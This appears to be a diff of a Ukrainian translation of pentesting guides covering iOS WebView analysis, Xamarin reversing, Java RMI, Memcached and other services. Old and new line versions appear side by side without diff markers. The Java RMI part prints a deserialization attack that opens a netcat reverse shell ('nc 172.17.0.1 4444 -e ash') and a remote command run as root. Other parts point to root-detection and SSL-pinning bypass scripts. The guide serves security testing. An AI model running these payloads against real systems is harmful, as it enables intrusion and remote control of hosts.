Динамічний аналіз передбачає перевірку купи на наявність екземплярів WebView та їх властивостей. Для цього використовується скрипт з назвою `webviews_inspector.js`, який націлений на екземпляри `UIWebView`, `WKWebView` та `SFSafariViewController`. Він реєструє інформацію про знайдені екземпляри, включаючи URL-адреси та налаштування, пов'язані з JavaScript та безпечним контентом.
Перевірку купи можна проводити за допомогою `ObjC.choose()`, щоб ідентифікувати екземпляри WebView та перевірити властивості `javaScriptEnabled` та `hasonlysecurecontent`.
```javascript:webviews_inspector.js
@ -114,7 +114,7 @@ frida -U com.authenticationfailure.WheresMyBrowser -l webviews_inspector.js
**Ключові результати**:
- Екземпляри WebViews успішно знайдені та перевірені.
- Перевірено активацію JavaScript та налаштування безпечного контенту.
- Перевірено налаштування активації JavaScript та безпечного контенту.
Цей підсумок охоплює критичні кроки та команди, що беруть участь в аналізі конфігурацій WebView через статичні та динамічні підходи, зосереджуючи увагу на функціях безпеки, таких як активація JavaScript та виявлення змішаного контенту.
@ -131,7 +131,7 @@ $ rabin2 -zz ./WheresMyBrowser | grep -i "loadHTMLString"
```
Щодо **доступу до файлів**, UIWebView дозволяє його універсально, тоді як WKWebView вводить налаштування `allowFileAccessFromFileURLs` та `allowUniversalAccessFromFileURLs` для управління доступом з файлових URL, причому обидва за замовчуванням мають значення false.
Приклад скрипта Frida надається для перевірки конфігурацій **WKWebView** щодо налаштувань безпеки:
Приклад скрипта Frida надається для перевірки конфігурацій **WKWebView** для налаштувань безпеки:
```bash
ObjC.choose(ObjC.classes['WKWebView'], {
onMatch: function (wk) {
@ -213,7 +213,7 @@ userContentController.add(javaScriptBridgeMessageHandler, name: "javaScriptBridg
```
### Взаємодія та Тестування
JavaScript може взаємодіяти з нативним шаром, визначаючи обробник повідомлень скрипта. Це дозволяє виконувати операції, такі як виклик нативних функцій з веб-сторінки:
JavaScript може взаємодіяти з рідним шаром, визначаючи обробник повідомлень скрипта. Це дозволяє виконувати операції, такі як виклик рідних функцій з веб-сторінки:
```javascript
function invokeNativeOperation() {
value1 = document.getElementById("value1").value
@ -258,16 +258,16 @@ message.webView?.evaluateJavaScript(javaScriptCallBack, completionHandler: nil)
Щоб ефективно налагоджувати веб-контент у iOS webviews, потрібна специфічна налаштування, що включає інструменти розробника Safari, оскільки повідомлення, надіслані до `console.log()`, не відображаються в журналах Xcode. Ось спрощений посібник, що підкреслює ключові кроки та вимоги:
- **Підготовка на пристрої iOS**: Необхідно активувати Safari Web Inspector на вашому пристрої iOS. Це робиться через **Налаштування > Safari > Додатково**, і увімкнення _Web Inspector_.
- **Підготовка на пристрої iOS**: Необхідно активувати Web Inspector Safari на вашому пристрої iOS. Це робиться через **Налаштування > Safari > Додатково**, і ввімкнення _Web Inspector_.
- **Підготовка на пристрої macOS**: На вашій розробницькій машині macOS потрібно увімкнути інструменти розробника в Safari. Запустіть Safari, перейдіть до **Safari > Налаштування > Додатково**, і виберіть опцію оказати меню Розробка_.
- **Підготовка на пристрої macOS**: На вашій розробницькій машині macOS потрібно ввімкнути інструменти розробника в Safari. Запустіть Safari, перейдіть до **Safari > Налаштування > Додатково**, і виберіть опцію оказати меню Розробка_.
- **З'єднання та налагодження**: Після підключення вашого пристрою iOS до комп'ютера macOS і запуску вашого додатку, використовуйте Safari на вашому пристрої macOS, щоб вибрати webview, який ви хочете налагоджувати. Перейдіть до _Розробка_ в меню Safari, наведіть курсор на ім'я вашого пристрою iOS, щоб побачити список екземплярів webview, і виберіть екземпляр, який ви хочете перевірити. Відкриється нове вікно Safari Web Inspector для цієї мети.
- **З'єднання та налагодження**: Після підключення вашого пристрою iOS до комп'ютера macOS і запуску вашого додатку, використовуйте Safari на вашому пристрої macOS, щоб вибрати webview, який ви хочете налагоджувати. Перейдіть до _Розробка_ в меню Safari, наведіть курсор на ім'я вашого пристрою iOS, щоб побачити список екземплярів webview, і виберіть екземпляр, який ви хочете перевірити. Відкриється нове вікно Web Inspector Safari для цієї мети.
Однак, будьте обережні з обмеженнями:
- Налагодження цим методом вимагає пристрою macOS, оскільки воно залежить від Safari.
- Тільки webviews у додатках, завантажених на ваш пристрій через Xcode, підлягають налагодженню. Webviews у додатках, встановлених через App Store або Apple Configurator, не можуть бути налагоджені цим способом.
- Тільки webviews у додатках, завантажених на ваш пристрій через Xcode, підлягають налагодженню. Webviews у додатках, встановлених через App Store або Apple Configurator, не можуть бути налагоджені таким чином.
## Посилання

16
src/mobile-pentesting/xamarin-apps.md
View File

@ -4,22 +4,22 @@
## **Основна інформація**
Xamarin є **платформою з відкритим кодом**, призначеною для розробників для **створення додатків для iOS, Android та Windows** з використанням фреймворків .NET та C#. Ця платформа надає доступ до численних інструментів та розширень для ефективного створення сучасних додатків.
Xamarin - це **платформа з відкритим кодом**, призначена для розробників для **створення додатків для iOS, Android та Windows** з використанням фреймворків .NET та C#. Ця платформа надає доступ до численних інструментів та розширень для ефективного створення сучасних додатків.
### Архітектура Xamarin
- Для **Android** Xamarin інтегрується з Android та Java просторами імен через .NET зв'язки, працюючи в середовищі виконання Mono разом з Android Runtime (ART). Managed Callable Wrappers (MCW) та Android Callable Wrappers (ACW) полегшують зв'язок між Mono та ART, обидва з яких побудовані на ядрі Linux.
- Для **iOS** додатки працюють під управлінням середовища виконання Mono, використовуючи повну компіляцію Ahead of Time (AOT) для перетворення коду C# .NET в ARM асемблерну мову. Цей процес відбувається поряд з Objective-C Runtime на ядрі, подібному до UNIX.
- Для **Android** Xamarin інтегрується з Android та Java просторами імен через прив'язки .NET, працюючи в середовищі виконання Mono разом з Android Runtime (ART). Managed Callable Wrappers (MCW) та Android Callable Wrappers (ACW) полегшують зв'язок між Mono та ART, обидва з яких побудовані на ядрі Linux.
- Для **iOS** додатки працюють під середовищем виконання Mono, використовуючи повну компіляцію Ahead of Time (AOT) для перетворення коду C# .NET в асемблерну мову ARM. Цей процес працює разом з Objective-C Runtime на ядрі, подібному до UNIX.
### .NET Runtime та Mono Framework
**.NET framework** включає збірки, класи та простори імен для розробки додатків, при цьому .NET Runtime керує виконанням коду. Він пропонує незалежність від платформи та зворотну сумісність. **Mono Framework** є версією .NET framework з відкритим кодом, ініційованою в 2005 році для розширення .NET на Linux, тепер підтримується Microsoft і очолюється Xamarin.
**.NET framework** включає збірки, класи та простори імен для розробки додатків, при цьому .NET Runtime керує виконанням коду. Він пропонує незалежність від платформи та зворотну сумісність. **Mono Framework** - це версія .NET framework з відкритим кодом, ініційована в 2005 році для розширення .NET на Linux, тепер підтримується Microsoft і очолюється Xamarin.
### Реверс-інжиніринг додатків Xamarin
#### Декомпіляція збірок Xamarin
Декомпіляція перетворює скомпільований код назад у вихідний код. У Windows вікно Модулі в Visual Studio може ідентифікувати модулі для декомпіляції, що дозволяє безпосередній доступ до стороннього коду та витягування вихідного коду для аналізу.
Декомпіляція перетворює скомпільований код назад у вихідний код. У Windows вікно Модулі у Visual Studio може ідентифікувати модулі для декомпіляції, що дозволяє безпосередній доступ до коду третіх сторін та витягування вихідного коду для аналізу.
#### JIT проти AOT компіляції
@ -37,7 +37,7 @@ python3 xamarin-decompress.py -o /path/to/decompressed/apk
```bash
pyxamstore unpack -d /path/to/decompressed/apk/assemblies/
```
Файли iOS dll легко доступні для декомпіляції, що розкриває значні частини коду програми, який часто має спільну базу на різних платформах.
Файли iOS dll легко доступні для декомпіляції, що відкриває значні частини коду програми, який часто має спільну основу на різних платформах.
### Статичний аналіз
@ -46,7 +46,7 @@ pyxamstore unpack -d /path/to/decompressed/apk/assemblies/
### Динамічний аналіз
Динамічний аналіз включає перевірку на SSL pinning та використання інструментів, таких як [Fridax](https://github.com/NorthwaveSecurity/fridax) для модифікацій .NET бінарників під час виконання в додатках Xamarin. Скрипти Frida доступні для обходу виявлення root або SSL pinning, що покращує можливості аналізу.
Динамічний аналіз передбачає перевірку на SSL pinning і використання інструментів, таких як [Fridax](https://github.com/NorthwaveSecurity/fridax) для модифікацій .NET бінарних файлів у програмах Xamarin під час виконання. Доступні скрипти Frida для обходу виявлення root або SSL pinning, що покращує можливості аналізу.
Інші цікаві скрипти Frida:
@ -54,7 +54,7 @@ pyxamstore unpack -d /path/to/decompressed/apk/assemblies/
- [**xamarin-root-detect-bypass**](https://codeshare.frida.re/@nuschpl/xamarin-root-detect-bypass/)
- [**Frida-xamarin-unpin**](https://github.com/GoSecure/frida-xamarin-unpin)
### Підписування заново
### Підписування
Інструмент [Uber APK Signer](https://github.com/patrickfav/uber-apk-signer) спрощує підписування кількох APK з одним і тим же ключем і може бути використаний для повторного підписування програми після внесення змін.

2
src/network-services-pentesting/10000-network-data-management-protocol-ndmp.md
View File

@ -2,7 +2,7 @@
# **Інформація про протокол**
З [Wikipedia](https://en.wikipedia.org/wiki/NDMP):
З [Вікіпедії](https://en.wikipedia.org/wiki/NDMP):
> **NDMP**, або **Протокол управління даними в мережі**, є протоколом, призначеним для транспортування даних між пристроями, підключеними до мережі зберігання \([NAS](https://en.wikipedia.org/wiki/Network-attached_storage)\), та пристроями [резервного копіювання](https://en.wikipedia.org/wiki/Backup). Це усуває необхідність транспортування даних через сам сервер резервного копіювання, тим самим підвищуючи швидкість і зменшуючи навантаження на сервер резервного копіювання.

2
src/network-services-pentesting/1026-pentesting-rusersd.md
View File

@ -4,7 +4,7 @@
## Основна інформація
Цей протокол надасть вам імена користувачів хоста. Ви можете знайти ці сервіси, перераховані службою порт-маппера, ось так:
Цей протокол надасть вам імена користувачів хоста. Ви можете знайти ці сервіси, перераховані службою порт-мепінгу, ось так:
![](<../images/image (1041).png>)

2
src/network-services-pentesting/1080-pentesting-socks.md
View File

@ -4,7 +4,7 @@
## Основна інформація
**SOCKS** - це протокол, що використовується для передачі даних між клієнтом і сервером через проксі. П'ята версія, **SOCKS5**, додає необов'язкову функцію аутентифікації, що дозволяє лише авторизованим користувачам отримувати доступ до сервера. Він в основному обробляє проксирування TCP-з'єднань та пересилання UDP-пакетів, працюючи на рівні сесії (Рівень 5) моделі OSI.
**SOCKS** - це протокол, що використовується для передачі даних між клієнтом і сервером через проксі. П'ята версія, **SOCKS5**, додає необов'язкову функцію аутентифікації, що дозволяє лише авторизованим користувачам отримувати доступ до сервера. Він в основному обробляє проксирування TCP-з'єднань і пересилання UDP-пакетів, працюючи на рівні сесії (Рівень 5) моделі OSI.
**Порт за замовчуванням:** 1080

14
src/network-services-pentesting/1099-pentesting-java-rmi.md
View File

@ -25,7 +25,7 @@ _nmap_ іноді має проблеми з ідентифікацією _SSL_
1. Щоб надіслати виклик методу через _Java RMI_, клієнти повинні знати IP-адресу, порт прослуховування, реалізований клас або інтерфейс та `ObjID` цільового об'єкта ( `ObjID` - це унікальний та випадковий ідентифікатор, який створюється, коли об'єкт стає доступним в мережі. Він потрібен, оскільки _Java RMI_ дозволяє кільком об'єктам прослуховувати один і той же _TCP_ порт).
2. Віддалені клієнти можуть виділяти ресурси на сервері, викликаючи методи на відкритому об'єкті. _Java віртуальна машина_ повинна відстежувати, які з цих ресурсів все ще використовуються, а які можуть бути зібрані сміттям.
Перший виклик вирішується _RMI реєстром_, який в основному є службою імен для _Java RMI_. Сам _RMI реєстр_ також є _RMI сервісом_, але реалізований інтерфейс та `ObjID` є фіксованими та відомими всім _RMI_ клієнтам. Це дозволяє _RMI_ клієнтам використовувати _RMI_ реєстр, просто знаючи відповідний _TCP_ порт.
Перший виклик вирішується за допомогою _RMI реєстру_, який в основному є службою імен для _Java RMI_. Сам _RMI реєстр_ також є _RMI сервісом_, але реалізований інтерфейс та `ObjID` є фіксованими та відомими всім _RMI_ клієнтам. Це дозволяє _RMI_ клієнтам використовувати _RMI_ реєстр, просто знаючи відповідний _TCP_ порт.
Коли розробники хочуть зробити свої _Java об'єкти_ доступними в мережі, вони зазвичай прив'язують їх до _RMI реєстру_. _Реєстр_ зберігає всю інформацію, необхідну для підключення до об'єкта (IP-адреса, порт прослуховування, реалізований клас або інтерфейс та значення `ObjID`) і робить її доступною під зрозумілим ім'ям ( _прив'язане ім'я_). Клієнти, які хочуть використовувати _RMI сервіс_, запитують _RMI реєстр_ про відповідне _прив'язане ім'я_, і реєстр повертає всю необхідну інформацію для підключення. Таким чином, ситуація в основному така ж, як і з звичайною _DNS_ службою. Наступний список показує невеликий приклад:
```java
@ -51,7 +51,7 @@ e.printStackTrace();
}
}
```
Другий з вищезгаданих викликів вирішується за допомогою _Distributed Garbage Collector_ (_DGC_). Це ще одна _RMI service_ з відомим значенням `ObjID` і вона доступна на практично кожному _RMI endpoint_. Коли _RMI client_ починає використовувати _RMI service_, він надсилає інформацію до _DGC_, що відповідний _remote object_ використовується. _DGC_ може відстежувати кількість посилань і здатний очищати невикористовувані об'єкти.
Другий з вищезгаданих викликів вирішується за допомогою _Distributed Garbage Collector_ (_DGC_). Це ще одна _RMI service_ з відомим значенням `ObjID` і вона доступна практично на кожному _RMI endpoint_. Коли _RMI client_ починає використовувати _RMI service_, він надсилає інформацію до _DGC_, що відповідний _remote object_ використовується. _DGC_ може відстежувати кількість посилань і здатний очищати невикористовувані об'єкти.
Разом з застарілою _Activation System_, це три стандартні компоненти _Java RMI_:
@ -59,11 +59,11 @@ e.printStackTrace();
2. _Activation System_ (`ObjID = 1`)
3. _Distributed Garbage Collector_ (`ObjID = 2`)
Стандартні компоненти _Java RMI_ відомі як вектори атак протягом досить тривалого часу, і існує кілька вразливостей в застарілих версіях _Java_. З точки зору атакуючого, ці стандартні компоненти є цікавими, оскільки вони реалізують відомі класи / інтерфейси, і з ними легко взаємодіяти. Ця ситуація відрізняється для кастомних _RMI services_. Щоб викликати метод на _remote object_, вам потрібно заздалегідь знати відповідний підпис методу. Без знання існуючого підпису методу немає способу зв'язатися з _RMI service_.
Стандартні компоненти _Java RMI_ відомі як вектори атак протягом досить тривалого часу, і в застарілих версіях _Java_ існує кілька вразливостей. З точки зору атакуючого, ці стандартні компоненти є цікавими, оскільки вони реалізують відомі класи / інтерфейси, і з ними легко взаємодіяти. Ця ситуація відрізняється для кастомних _RMI services_. Щоб викликати метод на _remote object_, вам потрібно заздалегідь знати відповідний підпис методу. Без знання існуючого підпису методу немає способу зв'язатися з _RMI service_.
## RMI Enumeration
[remote-method-guesser](https://github.com/qtc-de/remote-method-guesser) є _Java RMI_ сканером вразливостей, який здатний автоматично виявляти загальні _RMI vulnerabilities_. Коли ви виявляєте _RMI_ endpoint, вам слід спробувати:
[remote-method-guesser](https://github.com/qtc-de/remote-method-guesser) є _Java RMI_ сканером вразливостей, який здатний автоматично виявляти загальні _RMI vulnerabilities_. Коли ви виявляєте _RMI_ endpoint, вам слід спробувати це:
```
$ rmg enum 172.17.0.2 9010
[+] RMI registry bound names:
@ -125,7 +125,7 @@ $ rmg enum 172.17.0.2 9010
```
Вивід дії перерахунку пояснюється детальніше на [сторінках документації](https://github.com/qtc-de/remote-method-guesser/blob/master/docs/rmg/actions.md#enum-action) проекту. Залежно від результату, ви повинні спробувати перевірити виявлені вразливості.
Значення `ObjID`, які відображає _remote-method-guesser_, можна використовувати для визначення часу безперервної роботи сервісу. Це може дозволити виявити інші вразливості:
Значення `ObjID`, які відображає _remote-method-guesser_, можна використовувати для визначення часу безперервної роботи служби. Це може дозволити виявити інші вразливості:
```
$ rmg objid '[55ff5a5d:17e0501b054:-7ff8, -4004948013687638236]'
[+] Details for ObjID [55ff5a5d:17e0501b054:-7ff8, -4004948013687638236]
@ -175,7 +175,7 @@ $ rmg guess 172.17.0.2 9010
$ rmg call 172.17.0.2 9010 '"id"' --bound-name plain-server --signature "String execute(String dummy)" --plugin GenericPrint.jar
[+] uid=0(root) gid=0(root) groups=0(root)
```
Або ви можете виконати атаки десеріалізації, як це:
Або ви можете виконати атаки десеріалізації ось так:
```
$ rmg serial 172.17.0.2 9010 CommonsCollections6 'nc 172.17.0.1 4444 -e ash' --bound-name plain-server --signature "String execute(String dummy)"
[+] Creating ysoserial payload... done.
@ -209,7 +209,7 @@ uid=0(root) gid=0(root) groups=0(root)
## Відомі інтерфейси
[remote-method-guesser](https://github.com/qtc-de/remote-method-guesser) позначає класи або інтерфейси як `known`, якщо вони зазначені в внутрішній базі даних інструменту відомих _RMI services_. У цих випадках ви можете використовувати дію `known`, щоб отримати більше інформації про відповідний _RMI service_:
[remote-method-guesser](https://github.com/qtc-de/remote-method-guesser) позначає класи або інтерфейси як `known`, якщо вони внесені до внутрішньої бази даних інструменту відомих _RMI services_. У цих випадках ви можете використовувати дію `known`, щоб отримати більше інформації про відповідний _RMI service_:
```
$ rmg enum 172.17.0.2 1090 | head -n 5
[+] RMI registry bound names:

32
src/network-services-pentesting/11211-memcache/README.md
View File

@ -6,9 +6,9 @@
З [wikipedia](https://en.wikipedia.org/wiki/Memcached):
> **Memcached** (вимова: mem-cashed, mem-cash-dee) - це універсальна розподілена [система кешування пам'яті](https://en.wikipedia.org/wiki/Memory_caching). Вона часто використовується для прискорення динамічних веб-сайтів, що працюють з базами даних, шляхом кешування даних та об'єктів у RAM, щоб зменшити кількість разів, коли зовнішнє джерело даних (таке як база даних або API) повинно бути прочитане.
> **Memcached** (вимова: мем-кешд, мем-кеш-ді) - це загальносистемна розподілена [система кешування пам'яті](https://en.wikipedia.org/wiki/Memory_caching). Вона часто використовується для прискорення динамічних веб-сайтів, що працюють з базами даних, шляхом кешування даних та об'єктів у пам'яті (RAM), щоб зменшити кількість разів, коли зовнішнє джерело даних (таке як база даних або API) повинно бути прочитане.
Хоча Memcached підтримує SASL, більшість екземплярів **виставлені без аутентифікації**.
Хоча Memcached підтримує SASL, більшість екземплярів **відкриті без аутентифікації**.
**Порт за замовчуванням:** 11211
```
@ -53,13 +53,13 @@ msf > use auxiliary/scanner/memcached/memcached_amp #Check is UDP DDoS amplifica
```
## **Вивантаження ключів Memcache**
У сфері memcache, протоколу, який допомагає організовувати дані за допомогою слебів, існують специфічні команди для перевірки збережених даних, хоча з помітними обмеженнями:
У сфері memcache, протоколу, що допомагає організовувати дані за допомогою слебів, існують специфічні команди для перевірки збережених даних, хоча з помітними обмеженнями:
1. Ключі можуть бути вивантажені лише за класом слеба, групуючи ключі схожого розміру вмісту.
2. Існує обмеження в одну сторінку на клас слеба, що дорівнює 1MB даних.
1. Ключі можуть бути вивантажені лише за класом слебів, групуючи ключі схожого розміру вмісту.
2. Існує обмеження в одну сторінку на клас слебів, що дорівнює 1MB даних.
3. Ця функція є неофіційною і може бути припинена в будь-який момент, як обговорюється на [форумі спільноти](https://groups.google.com/forum/?fromgroups=#!topic/memcached/1-T8I-RVGKM).
Обмеження в можливості вивантажити лише 1MB з потенційно гігабайтів даних є особливо значним. Однак ця функціональність все ще може надати уявлення про патерни використання ключів, залежно від конкретних потреб. Для тих, хто менш зацікавлений у механіці, візит до [розділу інструментів](https://lzone.de/cheat-sheet/memcached#tools) відкриває утиліти для комплексного вивантаження. Альтернативно, процес використання telnet для прямої взаємодії з налаштуваннями memcached описано нижче.
Обмеження в можливості вивантажити лише 1MB з потенційно гігабайтів даних є особливо значним. Однак ця функціональність все ще може надати уявлення про патерни використання ключів, залежно від конкретних потреб. Для тих, хто менш зацікавлений у механіці, візит до [розділу інструментів](https://lzone.de/cheat-sheet/memcached#tools) розкриває утиліти для комплексного вивантаження. Альтернативно, процес використання telnet для прямої взаємодії з налаштуваннями memcached описано нижче.
### **Як це працює**
@ -79,7 +79,7 @@ set mykey 0 60 1
1
STORED
```
Виконання команди "stats slabs" після додавання ключа дає детальну статистику про використання слебів:
Виконання команди "stats slabs" після додавання ключа дає детальну статистику про використання слоїв:
```bash
stats slabs
[...]
@ -109,23 +109,23 @@ END
### **ВИВАНТАЖЕННЯ КЛЮЧІВ MEMCACHE (ВЕРСІЯ 1.4.31+)**
З версією memcache 1.4.31 та вище, введено новий, безпечніший метод для вивантаження ключів у виробничому середовищі, що використовує неблокуючий режим, як детально описано в [release notes](https://github.com/memcached/memcached/wiki/ReleaseNotes1431). Цей підхід генерує великий обсяг виходу, тому рекомендується використовувати команду 'nc' для підвищення ефективності. Приклади включають:
З версією memcache 1.4.31 та вище, введено новий, більш безпечний метод для вивантаження ключів у виробничому середовищі, що використовує неблокуючий режим, як зазначено в [випускних примітках](https://github.com/memcached/memcached/wiki/ReleaseNotes1431). Цей підхід генерує великий обсяг виходу, тому рекомендується використовувати команду 'nc' для підвищення ефективності. Приклади включають:
```bash
echo 'lru_crawler metadump all' | nc 127.0.0.1 11211 | head -1
echo 'lru_crawler metadump all' | nc 127.0.0.1 11211 | grep ee6ba58566e234ccbbce13f9a24f9a28
```
### **ІНСТРУМЕНТИ ДЛЯ ВИТЯГУВАННЯ**
### **ІНСТРУМЕНТИ ДЛЯ ВИТЯГУ**
Table [from here](https://lzone.de/blog).
| Мови програмування | Інструменти | Функціональність | | |
| ------------------- | ----------------------------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------ | -------------------------------------------------------------------------- | ------- |
| PHP | [simple script](http://snipt.org/xtP) | Друкує імена ключів. | | |
| PHP | [simple script](http://snipt.org/xtP) | Друкує назви ключів. | | |
| Perl | [simple script](https://wiki.jasig.org/download/attachments/13572172/memcached-clean.pl?version=1&modificationDate=1229693957401) | Друкує ключі та значення | | |
| Ruby | [simple script](https://gist.github.com/1365005) | Друкує імена ключів. | | |
| Ruby | [simple script](https://gist.github.com/1365005) | Друкує назви ключів. | | |
| Perl | [memdump](https://search.cpan.org/~dmaki/Memcached-libmemcached-0.4202/src/libmemcached/docs/memdump.pod) | Інструмент у модулі CPAN | [Memcached-libmemcached](https://search.cpan.org/~dmaki/Memcached-libmemc) | ached/) |
| PHP | [memcache.php](http://livebookmark.net/journal/2008/05/21/memcachephp-stats-like-apcphp/) | GUI для моніторингу Memcache, яка також дозволяє витягувати ключі | | |
| libmemcached | [peep](http://blog.evanweaver.com/2009/04/20/peeping-into-memcached/) | **Заморожує ваш процес memcached!!!** Будьте обережні, використовуючи це в продуктивному середовищі. Все ще використовуючи це, ви можете обійти обмеження в 1 МБ і дійсно витягнути **всі** ключі. | | |
| PHP | [memcache.php](http://livebookmark.net/journal/2008/05/21/memcachephp-stats-like-apcphp/) | GUI моніторингу Memcache, який також дозволяє витягувати ключі | | |
| libmemcached | [peep](http://blog.evanweaver.com/2009/04/20/peeping-into-memcached/) | **Заморожує ваш процес memcached!!!** Будьте обережні, використовуючи це в продуктивному середовищі. Все ще використовуючи його, ви можете обійти обмеження в 1 МБ і дійсно витягнути **всі** ключі. | | |
## Виправлення помилок <a href="#troubleshooting" id="troubleshooting"></a>
@ -150,9 +150,9 @@ set my_key 0 2592000 1
memcached сам по собі не підтримує реплікацію. Якщо вам це дійсно потрібно, вам слід використовувати рішення сторонніх розробників:
- [repcached](http://repcached.lab.klab.org/): багатоголове асинхронне реплікування (набір патчів memcached 1.2)
- [Couchbase memcached interface](http://www.couchbase.com/memcached): використовуйте CouchBase як заміну memcached
- [yrmcds](https://cybozu.github.io/yrmcds/): сумісний з memcached Master-Slave сховище ключ-значення
- [repcached](http://repcached.lab.klab.org/): Багато майстрів асинхронна реплікація (набір патчів memcached 1.2)
- [Couchbase memcached interface](http://www.couchbase.com/memcached): Використовуйте CouchBase як заміну memcached
- [yrmcds](https://cybozu.github.io/yrmcds/): Сумісний з memcached Master-Slave сховище ключ-значення
- [twemproxy](https://github.com/twitter/twemproxy) (також відомий як nutcracker): проксі з підтримкою memcached
### Команди Шпаргалка

Some files were not shown because too many files have changed in this diff Show More